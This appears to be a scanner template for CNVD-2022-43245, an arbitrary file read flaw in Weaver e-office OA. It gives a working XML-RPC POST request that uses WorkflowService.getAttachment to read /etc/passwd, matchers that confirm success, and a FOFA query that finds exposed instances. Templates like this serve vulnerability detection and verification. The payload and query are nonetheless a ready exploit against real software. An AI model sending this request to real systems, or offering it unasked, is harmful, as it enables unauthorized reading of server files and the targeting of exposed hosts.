## id: CNVD-2022-43245
## name: Weaver OA XmlRpcServlet - Arbitary File Read
## author: hack007x
## severity: high
## tags: cnvd,cnvd2022,weaver,e-office,oa,lfi,vuln
## description: e-office is a standard collaborative mobile office platform. Ltd. e-office has an arbitrary file reading vulnerability, which can be exploited by attackers to obtain sensitive information.
## affects: e-office
## fofa-query: app="泛微-协同办公OA"
## verification: true

POST /weaver/org.apache.xmlrpc.webserver.XmlRpcServlet HTTP/1.1
Host: {{Hostname}}
User-Agent: {{random_ua}}
Content-Type: application/xml

<?xml version="1.0" encoding="UTF-8"?><methodCall>
<methodName>WorkflowService.getAttachment</methodName>
<params><param><value><string>/etc/passwd</string>
</value></param></params></methodCall>

#@ condition: and
#@ matcher: body contains "<methodResponse><params><param><value><base64>"
#@ matcher: header["content-type"] contains "text/xml"
#@ matcher: status_code == 200





# @VEIL-STAMP: 7a84782fedebefef65f9df487a430db71198fcc06ae92f5c891437a03b90bb71
